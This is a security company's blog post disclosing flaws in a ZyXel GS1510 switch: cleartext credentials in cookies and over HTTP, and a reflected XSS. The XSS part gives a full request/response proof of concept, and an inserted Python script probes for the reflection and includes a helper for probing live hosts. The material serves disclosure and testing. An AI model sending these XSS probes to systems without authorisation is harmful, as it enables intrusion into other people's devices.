XSS « IT Security Geeks

Multiple vulnerabilities in ZyXel GS1510

A few weeks ago, the vulnerabilities that we identified were publicly released on Upsploit.com. These vulnerabilities were discovered in our testing environment while playing around with a ZyXel GS1510 Ethernet switch.

This advisory was publicly released on 2012-03-14 at 12:57:15 under the Upsploit reference UPS-2011-0042.

The vulnerabilities that were discovered were the following:

1. The cookie for the admin user of the switch stored both the admin username and the password in clear text.

2. The passwords of any users logging into the switch were submitted in clear text over HTTP to the following form handler:

http://192.168.1.5/webctrl.cgi

HTTP Request

GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

3. Cross Site Scripting

The payload fe07b</title><script>alert(1)</script>b7e71e54af6 was submitted as the name of an arbitrarily supplied request parameter.

This input was echoed unmodified in the application’s response, as can be seen below.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the reflected </title> closes the page title early, so the <script> element that follows it is parsed as markup by the browser rather than as title text.

Request

GET /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1 HTTP/1.1
Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: admin=password123

Response

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 18 Sep 2011 16:30:14 GMT
Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT
Accept-Ranges: bytes
Connection: close

<HTML>
<HEAD><TITLE>Index of /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1</TITLE></HEAD>
<BODY BGCOLOR="#99cc99" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>Index of /images/?fe
…[SNIP]…
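The reflection shown in the exchange above, checked programmatically. This is an added example written for this page, not code from the advisory, ZyXel or Upsploit. It assumes only what the capture shows: the thttpd directory listing echoes the raw request path into its TITLE and H2. The sample response body is constructed from the abridged capture, the hardened renderer is a hypothetical fix rather than ZyXel's patch, and the probe_live() helper and its host argument are assumptions for running the same check against a real device.

```python
"""Reflected XSS check for the thttpd directory-index reflection shown above.

Added example, not code from the advisory or the vendor. Assumptions that are
not in the original post: render_index_hardened() is a hypothetical fix,
SAMPLE_CAPTURED_BODY is reconstructed from the abridged capture, and
probe_live() targets a host supplied on the command line.
"""
import html
import http.client
import sys

CANARY_PREFIX = "fe07b"          # markers taken from the advisory's probe
CANARY_SUFFIX = "b7e71e54af6"
PAYLOAD = CANARY_PREFIX + "</title><script>alert(1)</script>" + CANARY_SUFFIX


def build_probe_path(directory="/images/"):
    """Path used in the advisory: the payload is the *name* of a query parameter.

    '<', '>', '/' and '()' are sent raw, as in the capture, so the response
    can be tested for a byte-for-byte echo."""
    return f"{directory}?{PAYLOAD}=1"


def classify_reflection(body, payload=PAYLOAD):
    """Return 'unescaped', 'escaped' or 'absent' for one HTTP response body.

    'unescaped' is the exploitable case: the premature </title> ends the page
    title early, so the <script> that follows is parsed as markup and runs.
    'escaped' is what a fixed page looks like: &lt;script&gt; stays text."""
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=False) in body:
        return "escaped"
    return "absent"


def render_index_vulnerable(request_path):
    """Mirror of the captured thttpd behaviour: raw path into TITLE and H2."""
    return (
        "<HTML>\n"
        f"<HEAD><TITLE>Index of {request_path}</TITLE></HEAD>\n"
        f"<BODY><H2>Index of {request_path}</H2></BODY></HTML>\n"
    )


def render_index_hardened(request_path):
    """Hypothetical fix (not the vendor's patch): HTML-escape the path before
    embedding it. html.escape() turns < > & " ' into entities, so a reflected
    </title> can no longer close the real <TITLE>."""
    safe_path = html.escape(request_path, quote=True)
    return (
        "<HTML>\n"
        f"<HEAD><TITLE>Index of {safe_path}</TITLE></HEAD>\n"
        f"<BODY><H2>Index of {safe_path}</H2></BODY></HTML>\n"
    )


# Constructed from the abridged capture in the advisory (headers dropped).
SAMPLE_CAPTURED_BODY = (
    "<HTML>\n"
    "<HEAD><TITLE>Index of /images/?fe07b</title><script>alert(1)</script>"
    "b7e71e54af6=1</TITLE></HEAD>\n"
    '<BODY BGCOLOR="#99cc99" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">\n'
    "<H2>Index of /images/?fe07b</title><script>alert(1)</script>"
    "b7e71e54af6=1</H2>\n"
)


def probe_live(host, port=80, directory="/images/", cookie=None, timeout=5):
    """Send the probe to a real device (hypothetical helper, only used when a
    host is given on the command line) and classify the reflection."""
    headers = {"Host": host, "Accept": "*/*", "Connection": "close"}
    if cookie:  # the advisory's capture carried the admin cookie
        headers["Cookie"] = cookie
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", build_probe_path(directory), headers=headers)
    body = conn.getresponse().read().decode("iso-8859-1", errors="replace")
    conn.close()
    return classify_reflection(body)


if __name__ == "__main__":
    path = build_probe_path()
    print("probe path     :", path)
    print("captured sample:", classify_reflection(SAMPLE_CAPTURED_BODY))
    print("vulnerable     :", classify_reflection(render_index_vulnerable(path)))
    print("hardened       :", classify_reflection(render_index_hardened(path)))
    if len(sys.argv) > 1:
        print("live target    :", probe_live(sys.argv[1]))
```

The check deliberately distinguishes a raw echo from an entity-encoded one: a scanner that only greps for the canary markers would flag the hardened page as well, while the exploitable condition is specifically the unencoded `</title><script>` sequence landing inside the TITLE element.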

Congratulations go out to Neil Fryer for identifying and reporting this issue.

We would also like to extend our gratitude to the staff at ZyXel and to the guys at Upsploit.com for working with us to get these vulnerabilities patched in a timely manner.

This is just another reason why it's always a good idea to have a penetration test, or at the very least a vulnerability assessment, conducted on all new devices that will be deployed within your organisation's network.

If you would like any details on our device security testing or penetration testing services please feel free to contact us.
